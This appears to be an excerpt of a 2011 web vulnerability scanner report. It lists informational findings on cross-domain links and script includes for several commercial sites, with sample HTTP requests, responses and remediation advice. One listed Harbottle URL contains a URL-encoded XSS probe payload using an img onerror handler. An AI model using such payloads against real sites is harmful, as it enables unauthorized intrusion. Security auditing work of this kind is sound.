Path:	/znode-multifront/default.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.znode.com/znode-multifront/default.aspx?pi_ad_id=7270542494&gclid=CLLul7r4iKsCFQVrgwodzysJ5Q

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js
http://destinationecommerce.com/
http://twitter.com/znode
http://www.facebook.com/home.php?ref=s
http://www.linkedin.com/groups/Destination-Ecommerce-3879822?gid=3879822&mostPopular=&trk=tyah
http://www.youtube.com/user/ZnodeInc
http://www.youtube.com/v/dqHwDpwVcic&hl=en_US&fs=0&rel=0&hd=0&showinfo=0

Request

GET /znode-multifront/default.aspx?pi_ad_id=7270542494&gclid=CLLul7r4iKsCFQVrgwodzysJ5Q HTTP/1.1
Host: www.znode.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 102934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="ctl00_ctl00_Head1"><title>
ASP.NET Ecommerce Shopping
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
...[SNIP]...


<a class="highslide" href="http://www.youtube.com/v/dqHwDpwVcic&hl=en_US&fs=0&rel=0&hd=0&showinfo=0" onclick="return openYouTube(this)"><img src="../Data/Default/Images/video-screen-shot-rollover.png" id="ctl00_ctl00_MainContent_SubContent_OverviewMenu_ctl00_idlinkimage" style="border:0 none;" />
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
...[SNIP]...


<a class="highslide" href="http://www.youtube.com/v/dqHwDpwVcic&hl=en_US&fs=0&rel=0&hd=0&showinfo=0" onclick="return openYouTube(this)"><img src="../Data/Default/Images/video-screen-shot-rollover.png" id="ctl00_ctl00_MainContent_SubContent_OverviewMenu_ctl01_idlinkimage" style="border:0 none;" />
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
...[SNIP]...


<a class="highslide" href="http://www.youtube.com/v/dqHwDpwVcic&hl=en_US&fs=0&rel=0&hd=0&showinfo=0" onclick="return openYouTube(this)"><img src="../Data/Default/Images/video-screen-shot-rollover.png" id="ctl00_ctl00_MainContent_SubContent_OverviewMenu_ctl03_idlinkimage" style="border:0 none;" />
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
...[SNIP]...
<div>
<a href="http://www.linkedin.com/groups/Destination-Ecommerce-3879822?gid=3879822&mostPopular=&trk=tyah" style="padding:0px 3px 0px 3px;" target="_blank"><img src="../data/default/images/new_Linkedin.png" alt="Linkd" border="0" /></a>
<a href="http://www.facebook.com/home.php#/pages/Znode/15484708769?ref=s" target="_blank" style="padding:0px 3px 0px 3px;"><img src="../data/default/images/new_facebook.png" id="ctl00_ctl00_Img4" alt="Facebook" border="0" /></a>
<a href="http://destinationecommerce.com/" target="_blank" style="padding:0px 3px 0px 3px;"><img src="../data/default/images/new_DE_Social_Icon.png" border="0" alt="DE social icon" /></a>

<a href="http://twitter.com/znode" target="_blank" style="padding:0px 3px 0px 3px;"><img src="../data/default/images/new_twitter.png" alt="Twitter" border="0" /></a>
<a href="http://www.youtube.com/user/ZnodeInc#p/u" style="padding:0px 3px 0px 3px;" target="_blank"><img src="../Data/Default/Images/new_Youtube.png" alt="youtube" border="0" style="vertical-align:top;" />
...[SNIP]...

20. Cross-domain script include previous next
There are 335 instances of this issue:

https://account.bigcommerce.com/cart.php
http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2
http://afe.specificclick.net/serve/v=5
http://afe.specificclick.net/serve/v=5
http://afe.specificclick.net/serve/v=5
http://blog.harbottle.com/dm/
http://blog.harbottle.com/dm/index.php
http://blog.ulf-wendel.de/
http://blogs.oracle.com/otn/resource/html/tweet2.html
http://cdn5.tribalfusion.com/media/1956006/frame.html
http://cdn5.tribalfusion.com/media/2516896//frm.html
https://cms.paypal.com/us/cgi-bin/
http://data.cnbc.com/quotes
http://data.cnbc.com/quotes/
http://data.cnbc.com/quotes/.DJIA
http://data.cnbc.com/quotes/.DJIA
http://data.cnbc.com/quotes/.DJIA/tab/1
http://data.cnbc.com/quotes/.DJIA/tab/2
http://data.cnbc.com/quotes/.FCHI
http://data.cnbc.com/quotes/.FCHI/tab/2
http://data.cnbc.com/quotes/.FTSE
http://data.cnbc.com/quotes/.FTSE/tab/2
http://data.cnbc.com/quotes/.GDAXI
http://data.cnbc.com/quotes/.GDAXI/tab/2
http://data.cnbc.com/quotes/.N225
http://data.cnbc.com/quotes/.N225/tab/2
http://data.cnbc.com/quotes/.SPX
http://data.cnbc.com/quotes/.SPX/tab/2
http://data.cnbc.com/quotes/CN
http://data.cnbc.com/quotes/CN
http://data.cnbc.com/quotes/COMP
http://data.cnbc.com/quotes/COMP/tab/2
http://data.cnbc.com/quotes/HK
https://deloitte.zettaneer.com/Subscriptions/
http://digg.com/submit
http://ecommerce-templates.volusion.com/
http://edge.sapient.com/assets/scripts/global.js
http://fls.doubleclick.net/activityi
https://login.cnbc.com/cas/login
http://oasc12059.247realmedia.com/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
https://register.cnbc.com/email/EmailSupport.jsp
https://register.cnbc.com/forgotPassword.do
https://register.cnbc.com/forgotPassword1.do
http://search.cnbc.com/main.do
http://support.bigcommerce.com/
https://support.bigcommerce.com/questions/1127/How+do+I+Setup+SocialShop+%28v2%29+Application+in+Facebook%3F
http://thinkwrap.com/contact/
http://thinkwrap.com/ourfocus/atg-ecommerce-solutions-partner/
http://thinkwrap.com/ourfocus/location-services/
http://thinkwrap.com/wp-content/uploads/2010/07/bg-header-nav-men.png
http://thinkwrap.com/wp-content/uploads/2010/07/bg-header-su-menu.gif
http://www.atg.com/
http://www.atg.com/en/solutions/
http://www.atg.com/service/main.jsp
https://www.atg.com/en/customers/listing/
https://www.atg.com/en/password/request/
https://www.atg.com/en/register/
https://www.atg.com/service/main.jsp
http://www.beautyproductsdirect.com/
http://www.beautyproductsdirect.com/lashes.html
http://www.bigcommerce.com/
http://www.bigcommerce.com/in-the-news.php
http://www.bigcommerce.com/lp/e1-lp-ecommerce.php
http://www.bigcommerce.com/plans.php
https://www.bigcommerce.com/buzz.php
https://www.bigcommerce.com/careers.php
https://www.bigcommerce.com/compatible-with.php
https://www.bigcommerce.com/login.php
https://www.bigcommerce.com/pci-compliant-shopping-cart-software.php
http://www.cnbc.com/
http://www.cnbc.com/id/15837856
http://www.cnbc.com/id/15837856/site/14081545/
http://www.cnbc.com/id/15838394
http://www.cnbc.com/id/15839263/
http://www.cnbc.com/pointrollads.htm
http://www.covergirl.com/__utm.gif
http://www.covergirl.com/beauty-products
http://www.covergirl.com/favicon.ico
http://www.covergirl.com/search/results=makeup%20eyelash
http://www.covergirl.com/search/results=xss%20help%20phone%20cable
http://www.csc.com/application_services/contact_us
http://www.csc.com/contact_us
http://www.csc.com/credit_services/contact_us/
http://www.csc.com/cybersecurity/contact_us
http://www.deloitte.com/view/en_US/us/Contact-us/email-us/index.htm
http://www.deloitte.com/view/en_US/us/Contact-us/index.htm
http://www.deloitte.com/view/en_US/us/Industries/Telecom-Telecommunications-Technology/a1a6da8d60fd4210VgnVCM200000bb42f00aRCRD.htm
http://www.deloitte.com/view/en_US/us/Industries/index.htm
http://www.deloitte.com/view/en_US/us/Insights/index.htm
http://www.deloitte.com/view/en_US/us/Services/additional-services/talent-human-capital-hr/Talent-Library/558d34d8a3a2f210VgnVCM3000001c56f00aRCRD.htm
http://www.deloitte.com/view/en_US/us/index.htm
http://www.deloitte.com/view/en_US/us/search/index.htm
http://www.dove.us/Products/Hair/
http://www.facebook.com/plugins/activity.php
http://www.fekkai.com/
http://www.fekkai.com/categories/conditioners/
http://www.fekkai.com/favicon.ico
http://www.fekkai.com/images/world_of_fekkai_box.jpg
http://www.fekkai.com/style/
http://www.fekkai.com/style/inspiration/
http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp
http://www.gillettevenus.com/en_US/goddess_central/styles/fancybox/jquery.fancybox-1.3.4.js
http://www.gillettevenus.com/en_US/images/go_roll.png
http://www.gillettevenus.com/en_US/products/refillables/embrace/index.jsp
http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp
http://www.gillettevenus.com/en_US/razor_finder/index.jsp
http://www.gillettevenus.com/en_US/search/index.jsp
http://www.gillettevenus.com/global/blank.html
http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
http://www.harbottle.com/hnl/pages/articles/direct_beauty_products_trimsole.php
http://www.harbottle.com/hnl/pages/hnl.php
http://www.harbottle.com/hnl/pages/hnl_search2.php
http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf
http://www.harbottle.com/hnl/pages/hnl_search2.php/a
http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg
http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif
http://www.harbottle.com/hnl/pages/pubs/479
http://www.harbottle.com/hnl/pix/newsletters/50th_logo.jpg
http://www.harbottle.com/hnl/pix/newsletters/ESportsMasthead.jpg
http://www.harbottle.com/hnl/pix/newsletters/gronholm_NSLTR.jpg
http://www.harbottle.com/hnl/pix/newsletters/rugby3.jpg
http://www.harbottle.com/hnl/pix/newsletters/sjones.jpg
http://www.harbottle.com/hnl/pix/square.gif
http://www.harbottle.com/hnl/pix/square_FF9933.gif
http://www.netsuite.com/portal/home.shtml
http://www.netsuite.com/portal/products/netsuite/financials/main.shtml
http://www.netsuite.com/portal/products/netsuite/revenue/main.shtml
http://www.oracle.com/ao/index.html
http://www.oracle.com/as/corporate/contact/bangladesh-316183-en-as.html
http://www.oracle.com/as/corporate/contact/bhutan-316187-en-as.html
http://www.oracle.com/as/corporate/contact/brunei-316198-en-as.html
http://www.oracle.com/as/corporate/contact/cambodia-316193-en-as.html
http://www.oracle.com/as/corporate/contact/laos-316260-en-as.html
http://www.oracle.com/as/corporate/contact/maldives-316209-en-as.html
http://www.oracle.com/as/corporate/contact/nepal-316215-en-as.html
http://www.oracle.com/as/corporate/contact/pakistan-316185-en-as.html
http://www.oracle.com/index.html
http://www.oracle.com/openworld/connect/face-to-face/welcome-reception/index.html
http://www.oracle.com/openworld/connect/index.html
http://www.oracle.com/openworld/contact/index.html
http://www.oracle.com/openworld/index.html
http://www.oracle.com/openworld/learn/index.html
http://www.oracle.com/openworld/learn/other/general-sessions/index.html
http://www.oracle.com/openworld/learn/other/oracle-university/index.html
http://www.oracle.com/openworld/register/packages/index.html
http://www.oracle.com/openworld/tools/index.html
http://www.oracle.com/openworld/tools/mobile/index.html
http://www.oracle.com/partners/admin/web_account.html
http://www.oracle.com/partners/en/how-to-do-business/index.html
http://www.oracle.com/partners/en/join-now/index.html
http://www.oracle.com/partners/en/knowledge-zone/index.html
http://www.oracle.com/partners/en/most-popular-resources/enablement-028916.htm
http://www.oracle.com/partners/en/opn-program/index.html
http://www.oracle.com/partners/en/opn-program/membership-resources/business-center/index.html
http://www.oracle.com/partners/en/opn-program/membership-resources/index.html
http://www.oracle.com/partners/en/opn-program/opn-details-by-levels/index.html
http://www.oracle.com/partners/en/opn-program/specialize/index.html
http://www.oracle.com/partners/index.html
http://www.oracle.com/partners/secure/development/index.html
http://www.oracle.com/partners/secure/development/order-technology-software/access-software-and-support-020672.htm
http://www.oracle.com/partners/secure/development/order-technology-software/index.html
http://www.oracle.com/partners/secure/marketing/download-logos/index.html
http://www.oracle.com/partners/secure/marketing/index.html
http://www.oracle.com/partners/secure/marketing/marketing-and-event-kits/index.html
http://www.oracle.com/partners/secure/membership/index.html
http://www.oracle.com/partners/secure/news/index.html
http://www.oracle.com/partners/secure/news/worldwide-opn-newsletter/index.html
http://www.oracle.com/partners/secure/sales/index.html
http://www.oracle.com/partners/secure/sales/partner-ordering-portal/partner-ordering-portal-020782.htm
http://www.oracle.com/partners/secure/sales/pricing-licensing/index.html
http://www.oracle.com/partners/secure/sales/resell-support/index.html
http://www.oracle.com/partners/secure/sales/sales-kits/index.html
http://www.oracle.com/partners/secure/support/index.html
http://www.oracle.com/technetwork/apps-tech/index-095827.html
http://www.oracle.com/technetwork/apps-tech/index-097651.html
http://www.oracle.com/technetwork/apps-tech/index.html
http://www.oracle.com/technetwork/architect/index.html
http://www.oracle.com/technetwork/articles/index.html
http://www.oracle.com/technetwork/community/developer-vm/index.html
http://www.oracle.com/technetwork/community/join/overview/index.html
http://www.oracle.com/technetwork/community/oracle-ace/index.html
http://www.oracle.com/technetwork/database/berkeleydb/downloads/index.html
http://www.oracle.com/technetwork/database/enterprise-edition/documentation/index.html
http://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html
http://www.oracle.com/technetwork/database/enterprise-edition/overview/index.html
http://www.oracle.com/technetwork/database/express-edition/downloads/index.html
http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html
http://www.oracle.com/technetwork/database/windows/downloads/index-101290.html
http://www.oracle.com/technetwork/dbadev/index.html
http://www.oracle.com/technetwork/developer-tools/apex/downloads/index.html
http://www.oracle.com/technetwork/developer-tools/eclipse/downloads/index.html
http://www.oracle.com/technetwork/developer-tools/index.html
http://www.oracle.com/technetwork/developer-tools/jdev/downloads/index.html
http://www.oracle.com/technetwork/developer-tools/sql-developer/downloads/index.html
http://www.oracle.com/technetwork/index.html
http://www.oracle.com/technetwork/indexes/documentation/index.html
http://www.oracle.com/technetwork/indexes/downloads/index.html
http://www.oracle.com/technetwork/indexes/products/index.html
http://www.oracle.com/technetwork/java/index.html
http://www.oracle.com/technetwork/middleware/fusion-middleware/documentation/index.html
http://www.oracle.com/technetwork/middleware/fusion-middleware/downloads/index.html
http://www.oracle.com/technetwork/middleware/fusion-middleware/overview/index.html
http://www.oracle.com/technetwork/middleware/jrockit/downloads/index.html
http://www.oracle.com/technetwork/middleware/soasuite/downloads/index.html
http://www.oracle.com/technetwork/oem/downloads/index-084446.html
http://www.oracle.com/technetwork/oem/grid-control/documentation/index.html
http://www.oracle.com/technetwork/oem/grid-control/downloads/index.html
http://www.oracle.com/technetwork/oem/grid-control/overview/index.html
http://www.oracle.com/technetwork/oramag/magazine/home/index.html
http://www.oracle.com/technetwork/server-storage/solaris/downloads/index.html
http://www.oracle.com/technetwork/systems/index.html
http://www.oracle.com/technetwork/topics/cloud/index.html
http://www.oracle.com/technetwork/topics/index.html
http://www.oracle.com/technetwork/topics/newtojava/index.html
http://www.oracle.com/technetwork/topics/newtojava/overview/index.html
http://www.oracle.com/technetwork/topics/security/index.html
http://www.oracle.com/technetwork/topics/soa/index.html
http://www.oracle.com/technetwork/topics/virtualization/index.html
http://www.oracle.com/us/ciocentral/index.html
http://www.oracle.com/us/community/index.html
http://www.oracle.com/us/corporate/Acquisitions/index.html
http://www.oracle.com/us/corporate/analystrelations/index.html
http://www.oracle.com/us/corporate/blogs/index.html
http://www.oracle.com/us/corporate/careers/index.html
http://www.oracle.com/us/corporate/citizenship/community/038108.htm
http://www.oracle.com/us/corporate/citizenship/index.html
http://www.oracle.com/us/corporate/customers/index.html
http://www.oracle.com/us/corporate/customers/oracle-users-groups-192206.html
http://www.oracle.com/us/corporate/features/engineered-173370.html
http://www.oracle.com/us/corporate/history/index.html
http://www.oracle.com/us/corporate/index.html
http://www.oracle.com/us/corporate/innovation/index.html
http://www.oracle.com/us/corporate/insight/index.html
http://www.oracle.com/us/corporate/investor-relations/corporate-governance-176724.html
http://www.oracle.com/us/corporate/investor-relations/index.html
http://www.oracle.com/us/corporate/oracle-racing-070515.html
http://www.oracle.com/us/corporate/press/BoardofDirectors/index.html
http://www.oracle.com/us/corporate/press/Executives/index.html
http://www.oracle.com/us/corporate/press/index.html
http://www.oracle.com/us/corporate/pricing/index.html
http://www.oracle.com/us/corporate/pricing/price-lists/index.html
http://www.oracle.com/us/corporate/profit/index.html
http://www.oracle.com/us/corporate/publishing/index.html
http://www.oracle.com/us/corporate/timeline/index.html
http://www.oracle.com/us/go/index.html
http://www.oracle.com/us/index.html
http://www.oracle.com/us/industries/communications/index.html
http://www.oracle.com/us/industries/education-and-research/018753.htm
http://www.oracle.com/us/industries/engineering-and-construction/index.html
http://www.oracle.com/us/industries/financial-services/index.html
http://www.oracle.com/us/industries/index.html
http://www.oracle.com/us/industries/retail/index.html
http://www.oracle.com/us/partnerships/solutions/index.html
http://www.oracle.com/us/partnerships/specialized-showcase-224514.html
http://www.oracle.com/us/products/applications/fusion/index.html
http://www.oracle.com/us/products/applications/index.html
http://www.oracle.com/us/products/applications/jd-edwards-enterpriseone/index.html
http://www.oracle.com/us/products/applications/peoplesoft-enterprise/index.html
http://www.oracle.com/us/products/applications/primavera/index.html
http://www.oracle.com/us/products/consulting/index.html
http://www.oracle.com/us/products/database/index.html
http://www.oracle.com/us/products/enterprise-manager/index.html
http://www.oracle.com/us/products/financing/index.html
http://www.oracle.com/us/products/index.html
http://www.oracle.com/us/products/middleware/exalogic/index.html
http://www.oracle.com/us/products/middleware/index.html
http://www.oracle.com/us/products/ondemand/index.html
http://www.oracle.com/us/products/productslist/index.html
http://www.oracle.com/us/products/servers-storage/index.html
http://www.oracle.com/us/products/servers-storage/solaris/index.html
http://www.oracle.com/us/products/tools/index.html
http://www.oracle.com/us/social-media/facebook/index.html
http://www.oracle.com/us/social-media/linkedin/index.html
http://www.oracle.com/us/social-media/twitter/index.html
http://www.oracle.com/us/solutions/corporate-governance/index.html
http://www.oracle.com/us/solutions/datawarehousing/index.html
http://www.oracle.com/us/solutions/ent-performance-bi/index.html
http://www.oracle.com/us/solutions/midsize/index.html
http://www.oracle.com/us/solutions/performance-scalability/index.html
http://www.oracle.com/us/solutions/solutions-165852.html
http://www.oracle.com/us/sun/index.html
http://www.oracle.com/us/support/advanced-customer-services/index.html
http://www.oracle.com/us/support/contact-068555.html
http://www.oracle.com/us/support/development-tools-080025.html
http://www.oracle.com/us/support/index.html
http://www.oracle.com/us/support/lifetime-support/index.html
http://www.oracle.com/us/support/oracle-support-services-359636.html
http://www.oracle.com/us/support/policies/index.html
http://www.oracle.com/us/support/premier/index.html
http://www.oracle.com/us/support/support-integration/index.html
http://www.oracle.com/us/syndication/subscribe/index.html
http://www.oracle.com/us/technologies/cloud/index.html
http://www.oracle.com/us/technologies/java/index.html
http://www.oracle.com/us/technologies/virtualization/index.html
http://www.oracleimg.com/us/assets/metrics/crossdomain.xml
http://www.rayalab.com/
http://www.rayalab.com/free_sample.html
http://www.readwriteweb.com/%22http://rww.readwriteweb.netdna-cdn.com/assets_c/2009/06/oralogo_june09-thumb-150x20-5948.gif/%22
http://www.readwriteweb.com/404.html
http://www.readwriteweb.com/enterprise/2010/11/oracle.php
http://www.resourcepoint.net/
http://www.resourcepoint.net/index.htm
http://www.sapient.com/en-us/about-sapient/alliances.html
http://www.sapient.com/en-us/about-sapient/alliances/atg.html
http://www.sapient.com/en-us/about-sapient/corporate-social-responsibility.html
http://www.sapient.com/en-us/search.html
http://www.shopify.com/
http://www.shopify.com/admin/auth/login
http://www.shopify.com/examples
http://www.shopify.com/login
http://www.shopify.com/tour
http://www.sophelle.com/Success-Stories/Automated-Website-Testing.html
http://www.tenzing.com/atg-ecommerce-hosting.asp
http://www.tenzing.com/cloud/cloud-pricing.asp
http://www.tenzing.com/cloud/sign-up-now.asp
http://www.tenzing.com/hosting-solutions.asp
http://www.tenzing.com/sitemap.asp
http://www.volusion.com/
http://www.volusion.com/a1/f/OpenSans-Regular-webfont.woff
http://www.volusion.com/a1/f/OpenSans-Semibold-webfont.woff
http://www.youtube.com/embed/kPJh9FWuOks
http://www.youtube.com/embed/oxqAPZmFSUU
http://www.znode.com/znode-multifront/architecture.aspx
http://www.znode.com/znode-multifront/default.aspx
http://www.znode.com/znode-multifront/feature.aspx

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

20.1. https://account.bigcommerce.com/cart.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://account.bigcommerce.com
Path:	/cart.php

Issue detail

The response dynamically includes the following script from another domain:

https://www.googleadservices.com/pagead/conversion.js

Request

POST /cart.php HTTP/1.1
Host: account.bigcommerce.com
Connection: keep-alive
Referer: http://www.bigcommerce.com/plans.php
Content-Length: 77
Cache-Control: max-age=0
Origin: http://www.bigcommerce.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php

a=add&reset=true&previousbillingcycle=-&pid=41&billingcycle=monthly&x=94&y=19

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:38:14 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 15663
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html lang="en">
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8">
   <ti
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.2. http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N763.SpecificMedia/B5646003.2

Issue detail

The response dynamically includes the following scripts from other domains:

http://c.betrad.com/surly.js?;ad_w=300;ad_h=250;coid=279;nid=1909;crid=179;
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

20.3. http://afe.specificclick.net/serve/v=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://afe.specificclick.net
Path:	/serve/v=5

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=176996%3Bb=1045098%3Bts=20110906110541%3Bdct=;ord=1315321541?

Request

Response

20.4. http://afe.specificclick.net/serve/v=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://afe.specificclick.net
Path:	/serve/v=5

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N763.SpecificMedia.com/B5645537.38;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=177065%3Bb=1045312%3Bts=20110906111049%3Bdct=;ord=1315321849?

Request

Response

20.5. http://afe.specificclick.net/serve/v=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://afe.specificclick.net
Path:	/serve/v=5

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=176996%3Bb=1045098%3Bts=20110906105905%3Bdct=;ord=1315321145?

Request

Response

20.6. http://blog.harbottle.com/dm/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.harbottle.com
Path:	/dm/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /dm/ HTTP/1.1
Host: blog.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Harbottle+%26+Lewis
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:43:23 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
X-Pingback: http://blog.harbottle.com/dm/xmlrpc.php
Status: 200 OK
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28681

